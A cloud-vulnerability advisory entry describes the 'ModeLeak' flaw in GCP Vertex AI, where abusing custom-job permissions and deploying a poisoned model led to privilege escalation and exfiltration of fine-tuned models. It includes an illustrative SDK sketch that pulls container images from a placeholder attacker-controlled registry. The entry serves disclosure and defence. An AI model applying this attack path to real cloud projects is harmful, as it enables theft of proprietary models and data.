Severity

high

ModeLeak: LLM Model Exfiltration Vulnerability in Vertex AI

Published Tue, Nov 12th, 2024

Platforms

gcp

Summary

A vulnerability in GCP's Vertex AI service allowed privilege escalation and unauthorized access to sensitive LLM models, enabling attackers to exfiltrate those models by abusing misconfigured access controls and service bindings. By exploiting custom job permissions, researchers escalated their privileges and gained unauthorized access to all data services in the project. In addition, deploying a poisoned model in Vertex AI led to the exfiltration of every other fine-tuned model in the project, exposing proprietary and sensitive data.
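The two stages described above can be illustrated with the public Vertex AI Python SDK (google-cloud-aiplatform). The sketch below is illustrative only: the project ID, region, staging bucket, container image URIs, and display names are hypothetical placeholders, and it does not reproduce the actual containers or payloads used in the original research.

    # Minimal sketch of the two attack stages, assuming hypothetical
    # project, bucket, and image names (none come from the original research).
    from google.cloud import aiplatform

    aiplatform.init(
        project="victim-project",                    # hypothetical target project
        location="us-central1",
        staging_bucket="gs://victim-staging-bucket", # hypothetical bucket
    )

    # Stage 1: submit a custom job whose container runs code chosen by the
    # submitter. The job executes under a Vertex AI service identity, which is
    # the custom-job permission path the summary says was used to escalate
    # privileges and reach other data services in the project.
    job = aiplatform.CustomJob(
        display_name="innocuous-training-job",
        worker_pool_specs=[{
            "machine_spec": {"machine_type": "n1-standard-4"},
            "replica_count": 1,
            "container_spec": {
                # Hypothetical attacker-controlled image; its entrypoint could,
                # for example, enumerate project resources using the job's
                # service identity.
                "image_uri": "us-docker.pkg.dev/attacker-project/repo/recon:latest",
            },
        }],
    )
    job.submit()

    # Stage 2: upload a model backed by a custom serving container and deploy
    # it to an endpoint. The summary describes how a poisoned model deployed
    # this way led to exfiltration of the project's other fine-tuned models.
    model = aiplatform.Model.upload(
        display_name="poisoned-model",
        serving_container_image_uri=(
            "us-docker.pkg.dev/attacker-project/repo/poisoned-serving:latest"
        ),
    )
    endpoint = model.deploy(machine_type="n1-standard-4")

Both calls use standard SDK entry points (CustomJob.submit, Model.upload, Model.deploy); the malicious behavior lives entirely inside the attacker-supplied container images, which is why the deployment itself looks like ordinary Vertex AI usage.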

Affected Services

Vertex AI

Remediation

None required

Tracked CVEs

No tracked CVEs

References

Contributed by https://github.com/OfirBalassiano

Entry Status

Finalized

Disclosure Date

-

Exploitability Period

-

Known ITW Exploitation

-

Detection Methods

None

Piercing Index Rating

-

Discovered by

Ofir Balassiano and Ofir Shaty, Palo Alto Networks